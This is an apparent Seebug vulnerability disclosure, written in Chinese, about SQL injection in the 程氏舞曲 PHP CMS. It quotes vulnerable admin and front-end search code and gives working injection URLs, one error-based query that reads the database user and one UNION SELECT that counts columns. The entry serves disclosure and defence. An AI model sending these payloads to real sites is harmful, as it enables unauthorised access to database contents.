程氏舞曲CMS最新php版本多处sql注入漏洞

2014-02-18T00:00:00
ID SSV:94563
Type seebug
Reporter Root
Modified 2014-02-18T00:00:00

Description

简要描述:

操蛋捏。

详细说明:

昨天刚下载的,2.16号更新的版本。 第一处在管理后台:https://images.seebug.org/upload/app/controllers/admin/news.php第66行

public function so() { $key = $this->input->get('key');//使用get方式获取相关参数,没做处理 $user = $this->input->get('user'); $cid = $this->input->get('cid'); $page = $this->input->get('page'); if(empty($page)) $page=1; $sql_string = "SELECT * FROM ".CS_SqlPrefix."news where 1=1"; if($key){ $sql_string.= " and CS_Name like '%".$key."%'"; } if($user){ $sql_string.= " and CS_User like '%".$user."%'"; } if($cid){ if($cid=="-1"){ $sql_string.= " and cs_hid=1"; }elseif($cid=="-2"){ $sql_string.= " and cs_yid=1"; }else{ $sql_string.= " and CS_CID=".$cid.""; } } $sql_string.= " order by CS_AddTime desc";//拼接字符串 $query = $this->db->query($sql_string); //没处理带入查询 $total = $query->num_rows();

请求url:http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/admin/dance/so/?key=1' AND (SELECT 5960 FROM(SELECT COUNT(),CONCAT((select user()),(SELECT (CASE WHEN (5960=5960) THEN 1 ELSE 0 END)),FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)%23 利用显错读取信息。

<img src="https://images.seebug.org/upload/201402/180920338e24e8172c1119ba2cfdb52b05a42d33.png" alt=".png" width="600" onerror="javascript:errimg(this);">

      还有一处在前台:https://images.seebug.org/upload/app/controllers/singer.php第127行

public function so() { $data='';$data_content=''; $fid = $this-&gt;security-&gt;xss_clean($this-&gt;uri-&gt;segment(3)); //方式 $key = $this-&gt;security-&gt;xss_clean($this-&gt;uri-&gt;segment(4)); //关键字 $page = intval($this-&gt;security-&gt;xss_clean($this-&gt;uri-&gt;segment(5))); //页数 if($page==0) $page=1; if(empty($key)) $key = $this-&gt;input-&gt;post('key', TRUE);//以post方式接受key值

 跟踪变量同一文件165行 :

if($fid=='zm' && in_array(strtoupper($key),$zimu_arr)){ //按字母搜索 $posarr=array_keys($zimu_arr,strtoupper($key)); $pos=$posarr[0]; $sqlstr="SELECT * FROM ".CS_SqlPrefix."singer where CS_YID=0 and ((ord( substring( CS_Name, 1, 1 ) ) -65536&gt;=".($zimu_arr1[$pos])." and ord( substring( CS_Name, 1, 1 ) ) -65536&lt;=".($zimu_arr2[$pos]).")) or UPPER(substring( CS_Name, 1, 1 ))='".$zimu_arr[$pos]."'"; }else{ $sqlstr="select * from ".CS_SqlPrefix."singer where CS_YID=0 and CS_Name like '%".$key."%' order by CS_AddTime desc";//$key带入查询,中间没做处理 }

<img src="https://images.seebug.org/upload/201402/18092519b9d8b9104c8c44b319c0436a1d3a289e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

第二处没法根据显错读取信息,sql语句不过关... 但是可以使用union读取字段等信息(附上payload:http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/vod/so/key/%25%27%20union%20select%201%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%23) 返回正确,表示有39个字段